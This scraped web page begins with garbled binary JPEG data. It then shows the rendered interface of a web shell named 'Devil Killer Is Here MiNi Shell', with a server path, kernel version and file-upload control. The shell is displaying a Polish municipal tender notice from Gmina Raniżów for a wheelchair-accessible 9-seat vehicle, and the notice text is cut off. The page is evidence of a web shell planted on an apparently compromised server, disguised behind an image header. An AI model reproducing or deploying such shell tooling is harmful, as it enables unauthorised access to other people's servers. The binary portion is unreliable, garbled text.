JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230825/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230825/0036838701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Zakup samochodu 9-cio osobowego do przewozu osób niepełnosprawnych dla Środowiskowego Domu Samopomocy w Woli Raniżowskiej ” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA RANIŻÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690581689</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Raniżów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-130</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">m.bober@ranizow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.ranizow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zakup samochodu 9-cio osobowego do przewozu osób niepełnosprawnych dla Środowiskowego Domu Samopomocy w Woli Raniżowskiej ” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c3f72e66-4338-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00368387</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00075405/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup samochodu 9-cio osobowego do przewozu osób niepełnosprawnych dla Środowiskowego Domu Samopomocy w Woli Raniżowskiej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ranizow.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ranizow.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">14.1. Postępowanie prowadzone jest<br/>przy użyciu środków komunikacji elektronicznej. Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu<br/>Platformy Przetargowej Gminy Raniżów: https://ranizow.logintrade.net/rejestracja/ustawowe.html Do połączenia używany jest<br/>szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufność<br/>transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie Przetargowej Gminy Raniżów ma<br/>dostęp do możliwości złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytań do treści SWZ<br/>oraz komunikację z Zamawiającym w pozostałych obszarach.<br/>14.2. W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a wykonawcami, w szczególności składanie<br/>ofert oraz oświadczeń odbywa się przy użyciu środków komunikacji elektronicznej.<br/>Środkiem komunikacji elektronicznej, służącym złożeniu oferty przez Wykonawcę, jest jego prawidłowe złożenie na Platformie za<br/>pośrednictwem strony internetowej prowadzonego postępowania określonej w pkt. 2 ppkt. 2.4. Korzystanie z Platformy Przetargowej<br/>przez Wykonawcę jest bezpłatne.<br/>14.3. Zamawiający wyznacza do kontaktowania się z Wykonawcami:<br/>Magdalena Bober –Podinspektor UG (sprawy dot. procedury postępowania),<br/>Monika Stopińska-Pacyna - Inspektor UG (sprawy merytoryczne).<br/>14.4. Szczegółowe Instrukcje korzystania z Platformy dostępne są pod adresem:<br/>https://ranizow.logintrade.net/rejestracja/ustawowe.html<br/>14.5. Zalecenia Zamawiającego odnośnie kwalifikowanego podpisu elektronicznego:<br/> dla dokumentów w formacie „pdf” zaleca się podpis w formatem PAdES,<br/> dokumenty w formacie innym niż „pdf” zaleca się podpisywać formatem XAdES.<br/>Zalecenia Zamawiającego odnośnie podpisu osobistego:<br/> dla dokumentów w formacie „pdf” lub „xml” zaleca się podpis wewnętrzny (otoczony),<br/> dokumenty w formacie innym niż „pdf” zaleca się podpisywać podpisem zewnętrznym lub otaczającym.<br/>Zalecenia Zamawiającego odnośnie podpisu zaufanego.<br/> wielkość dokumentów nie może przekraczać 10 MB.<br/>• dla dokumentów w formacie „pdf” zaleca się podpis formatem PAdES (podpisany plik ma rozszerzenie .pdf),<br/>• dokumenty w formacie innym niż „pdf” zaleca się podpisywać formatem XAdES (podpisany plik ma rozszerzenie .xml).<br/>14.6. Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń<br/>oraz informacji przekazywanych przy użyciu Platformy Przetargowej Gminy Raniżów:<br/>https://ranizow.logintrade.net/rejestracja/ustawowe.html<br/>Dopuszczalne przeglądarki internetowe:<br/>• Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11,<br/>• Google Chrome 31<br/>• Mozilla Firefox 26<br/>• Opera 18<br/>Pozostałe wymagania techniczne:<br/>• dostęp do sieci Internet<br/>• obsługa przez przeglądarkę protokołu XMLHttpRequest - ajax<br/>• włączona obsługa JavaScript<br/>• zalecana szybkość łącza internetowego powyżej 500 KB/s<br/>• zainstalowany Acrobat Reader<br/>• zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy.<br/>14.7. Oświadczenia lub dokumenty przekazywane za pośrednictwem środka komunikacji elektronicznej przesyła się w formatach<br/>danych określonych w przepisach wydanych na podstawie § 2 ust. 1 i 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia<br/>2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz.<br/>2452). Równocześnie Zamawiający rekomenduje na format danych przesyłanych plików: .pdf,<br/>Maksymalny rozmiar pojedynczego pliku to 150 MB, przy czym nie określa się limitu liczby plików.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) Administratorem danych osobowych Wykonawcy będzie Gmina Raniżów, Rynek 6, 36-<br/>130 Raniżów, tel. 17 2285 034, a osobą pełniącą funkcje Inspektora Ochrony Danych, pan Jerzy Komaniecki;<br/>2) W sprawach związanych z przetwarzaniem danych osobowych, można kontaktować się z Inspektorem Ochrony Danych, za<br/>pośrednictwem adresu e-mail: rodo@ranizow.pl , tel. 696 415 177;<br/>dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o<br/>udzielenie zamówienia publicznego realizowanym pn: „Zakup samochodu 9-cio osobowego do przewozu osób niepełnosprawnych<br/>dla Środowiskowego Domu Samopomocy w Woli Raniżowskiej ”<br/>3) zgodnie z ustawą Prawo zamówień publicznych dalej jako: Pzp oraz przepisami wykonawczymi do Pzp. odbiorcami danych<br/>osobowych będą upoważnieni pracownicy Administratora, podmioty, z którymi Administrator zawarł umowy, w szczególności na<br/>bieżącą obsługę platformy przetargowej PZP24.pl, świadczenie usług prawnych, osoby lub podmioty uczestniczące przy realizacji<br/>dostaw/usług/robót budowlanych, osoby lub podmioty, którym udostępniono dokumentację postępowania na podstawie ustawy<br/>Prawo zamówień publicznych, osoby lub podmioty, które złożyły wniosek o udostępnienie informacji publicznej, w przypadku zadań<br/>współfinansowanych ze środków europejskim podmioty wskazane w przepisach prawa i decyzjach/umowach w sprawie<br/>dofinansowania projektu, a także inne podmioty/osoby/organy w zakresie i na zasadach określonych innymi przepisami prawa;<br/>4) dane osobowe przechowywane będą zgodnie z obowiązującym w jednostce Jednolitym Rzeczowym Wykazem Akt, przepisami<br/>ustawy Prawo zamówień publicznych, względnie przez okres gwarancji/rękojmi wynikający z zawartej umowy albo 15 lat w<br/>przypadku zamówień współfinansowanych ze środków europejskich;<br/>5) obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Prawo zamówień<br/>publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego oraz wymogiem umownym/warunkiem<br/>zawarcia umowy. Konsekwencje niepodania określonych danych wynikają z ustawy Prawo zamówień publicznych lub mogą<br/>uniemożliwić zawarcie umowy;<br/>6) osobie przysługuje prawo dostępu1 do treści swoich danych osobowych oraz otrzymania ich kopii, prawo do ich sprostowania2<br/>oraz prawo żądania od Administratora ograniczenia3 przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO.<br/>1) Wyjaśnienie: Administrator (Zamawiający) ma prawo do żądania od osoby, której dane dotyczą, wskazania dodatkowych<br/>informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego.<br/>2) Wyjaśnienie: Skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą ani nie może naruszać<br/>integralności protokołu oraz jego załączników.<br/>3) Wyjaśnienie: Prawo do ograniczenia przetwarzania nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia publicznego.<br/>Pozostałe informacje zawarte w pkt 30 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UG.271.2.2023.PEF</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 198894,76 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> * Liczba miejsc – 9, włącznie z miejscem kierowcy (liczba musi wynikać z homologacji),<br/> w tym 1 miejsce przystosowane do przewozu osoby na wózku inwalidzkim<br/>* Samochód fabrycznie nowy, rok produkcji 2023, nieużywany, nie powystawowy<br/> *Homologacja auta podstawowego i skompletowanego (jeżeli dotyczy) lub dokumenty umożliwiające rejestrację/ przerejestrowanie jako samochód do przewozu osób niepełnosprawnych <br/>* Dopuszczalna masa całkowita do 3,2 tony <br/> *Silnik o zapłonie samoczynnym o mocy nie mniejszej niż 125 KM z turbodoładowaniem <br/> *Pojemność silnika nie mniej niż 1900 cm3 <br/> *Rodzaj paliwa - ON <br/> *Skrzynia biegów manualna minimum 5-cio stopniowa <br/> *Lakier zwykły – kolor do ustalenia z wyjątkiem czarnego<br/> *Alarm antywłamaniowy z własnym zasilaniem<br/> *Napęd na przednią oś<br/> *Wspomaganie układu kierowniczego <br/> *Regulacja kolumny kierowniczej <br/> *Poduszka powietrzna kierowcy i pasażera <br/> *Lusterka boczne elektrycznie ustawiane i podgrzewane elektrycznie sterowane szyby - przód, szyba przednia podgrzewana <br/> *Min. radio z nagłośnieniem pojazdu i zestawem głośnomówiącym <br/> *Obrotomierz<br/> *Oświetlenie w podsufitce <br/> *Oświetlenie przedziału pasażerskiego <br/> *Przednie światła p/mgielne <br/> *Centralny zamek sterowany pilotem, auto-alarm, <br/> *Regulacja wysokości fotela kierowcy co najmniej w 3 płaszczyznach <br/> *Przesuwane prawe drzwi boczne <br/> *Boczny schodek antypoślizgowy przy drzwiach przesuwnych i uchwyt wewnętrzny ułatwiający wsiadanie <br/> *Drzwi tylne dwuskrzydłowe przeszklone <br/> *Pełne przeszklenie samochodu <br/> *Klimatyzacja automatyczna lub manualna dwustrefowa (przód i tył pojazdu) <br/> *Czujniki parkowania przednie i tylne ( przemyśleć może tylko tył)<br/> *Immobiliser <br/> *Pełnowymiarowe koło zapasowe <br/> *Bezwładnościowe pasy bezpieczeństwa wszystkie siedzenia wyposażone w 3 punktowe pasy bezpieczeństwa<br/> *Hamulce tarczowe przód i tył<br/> *Felgi stalowe 16” z oponami zimowymi i letnimi wraz z kołpakami <br/> *Chlapacze przód i tył <br/> *Dokumentacja umożliwiająca dopuszczenie do ruchu <br/> *Zbiornik paliwa min. 70 litrów <br/> *Dywaniki gumowe przód <br/>*Atestowane stanowisko do mocowania wózka inwalidzkiego (listwy cargo w podłodze, pasy mocujące wózek, 3-punktowe pasy bezpieczeństwa dla osoby podróżującej wózku inwalidzkim)<br/>*Platforma najazdowa do wprowadzenia wózków inwalidzkich. <br/>* Trzy rzędy siedzeń (w pierwszym rzędzie fotel kierowcy i fotel dwuosobowy, drugi i trzeci rząd składane i wyjmowane). Fotele tapicerowane, z regulowanymi oparciami i trzypunktowymi pasami bezpieczeństwa <br/> *Podsufitka tapicerowana <br/> *Tapicerka foteli w pojeździe materiałowa w ciemnym kolorze <br/> *Podłoga antypoślizgowa, łatwo zmywalna, na całej długości pojazdu <br/> *Oznakowanie pojazdu zgodne z przepisami dotyczącymi przewozu osób niepełnosprawnych <br/> *System zapobiegający blokowaniu kół podczas hamowania (ABS lub równoważny), <br/> *System stabilizacji toru jazdy (ESP lub równoważny,) <br/> *System podziału siły hamowania ( EBD lub równoważny) <br/> *System ułatwiający ruszanie pod górę (HSA lub równoważny) <br/> *Wyposażenie dodatkowe: dedykowany podnośnik samochodowy, klucz do kół, gaśnica, trójką ostrzegawczy, apteczka pierwszej pomocy. <br/> *Pełna gwarancja mechaniczna bez względu na ilość przejechanych kilometrów – minimum 24 miesiące, <br/> *Gwarancja na perforację blach - minimum 10 lat, <br/> *Gwarancja na powłokę lakierniczą - minimum 24 miesięcy <br/> *Gwarancja na platformę najazdową – minimum 24 miesiące <br/> *Szerokość zewnętrzna pojazdu wraz z lusterkami min. 2250 mm <br/> *Wysokość całkowita pojazdu min. 1950 mm <br/> *Komputer pokładowy informujący o średnim i chwilowym zużyciu paliwa<br/>*Pojazd winien spełniać wymagania obowiązujące na terenie Polski i dotyczące dopuszczenia<br/>pojazdów do ruchu drogowego, aktów prawnych oraz jest wykonany zgodnie z warunkami<br/>określonymi w Rozporządzeniu Ministra Infrastruktury z dnia 31.12.2002 r. w sprawie<br/>warunków technicznych pojazdów oraz zakresu wyposażenia ( Dz.U. z 2016 r. poz. 2022<br/>z późniejszymi zmianami ) i posiadać wszystkie świadectwa homologacji oraz wymagane<br/>certyfikaty umożliwiające rejestrację/ przerejestrowanie pojazdu jako samochód osobowy przeznaczony do przewozu osób niepełnosprawnych, w tym 1 osoby na wózku inwalidzkim wydane przez ustawowo uprawniony organ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34115000-6 - Inne samochody pasażerskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">21.1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące<br/>kryteria oceny ofert:<br/>(C) Cena – 60 %<br/>(OAS) Odległość autoryzowanego serwisu – 20%<br/>(G) Okres gwarancji i rękojmi – 20%<br/>21.1.1. Kryterium „Cena”:<br/>Kryterium „Cena (C)” będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez<br/>Wykonawcę w formularzu ofertowym.<br/>Zamawiający ofercie o najniżej cenie spośród ofert ocenianych przyzna 60 punktów a każdej następnej zostanie przyporządkowana<br/>liczba punktów proporcjonalnie mniejsza, według wzoru:<br/>C = ( Cmin / Cb ) x 100 x 60 %<br/>gdzie:<br/>C – ilość punktów przyznana za cenę<br/>C min – najniższa cena w złożonych ofertach<br/>C b – cena badanej oferty<br/>100- wskaźnik stały<br/>60 % - procentowe znaczenie kryterium cena<br/>Oferta w kryterium cena (C) może otrzymać maksymalnie 60 punktów.<br/>21.1.2. Kryterium „Odległość autoryzowanego serwisu”:<br/>Autoryzowany serwis samochodu musi być świadczony w odległości nie większej niż 100 km od siedziby Środowiskowego Domu<br/>Samopomocy w Woli Raniżowskiej, 36-130 Raniżów, Wola Raniżowska 586.<br/>Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza zobowiązany będzie dostarczyć wykaz Autoryzowanych<br/>Serwisów Obsługi przed podpisaniem umowy.<br/>Zamawiający przy obliczeniu punktów w tym kryterium zastosuje następujące wyliczenie:<br/>- odległość autoryzowanego serwisu do 50 kilometrów do siedziby Środowiskowego Domu Samopomocy w Woli Raniżowskiej - 20<br/>pkt<br/>- odległość autoryzowanego serwisu powyżej 50 kilometrów do 75 kilometrów do siedziby Środowiskowego Domu Samopomocy w<br/>Woli Raniżowskiej - 10 pkt<br/>- odległość autoryzowanego serwisu powyżej 75 kilometrów do 100 kilometrów do siedziby Środowiskowego Domu Samopomocy w<br/>Woli Raniżowskiej - 0 pkt<br/>Punkty zostaną przyznane na podstawie oświadczenia Wykonawcy w treści ofert.<br/>Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksymalnie 20 punktów.<br/>21.1.3. Kryterium „Okres gwarancji i rękojmi”:<br/>Przez kryterium okres gwarancji i rękojmi na silnik i podzespoły, bez limitu kilometrów (G) do oceny Zamawiający przyjmuje okres<br/>gwarancji i rękojmi wskazany przez Wykonawcę w formularzu ofertowym.<br/>Zgodnie z warunkami SWZ minimalny okres gwarancji i rękojmi wynosi minimum 24 miesiące.<br/>Zamawiający przy obliczeniu punktów w tym kryterium zastosuje następujące wyliczenie:<br/>• udzielenie 24 miesięcznej gwarancji i rękojmi na dostawy objęte zamówieniem - 0 pkt<br/>• udzielenie 36 miesięcznej gwarancji i rękojmi na dostawy objęte zamówieniem - 10 pkt<br/>• udzielenie 48 miesięcznej gwarancji i rękojmi na dostawy objęte zamówieniem - 20 pkt<br/>Oferta w kryterium okres gwarancji i rękojmi może otrzymać maksymalnie 20 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość autoryzowanego serwisu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 8.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają określone<br/>przez zamawiającego warunki udziału w 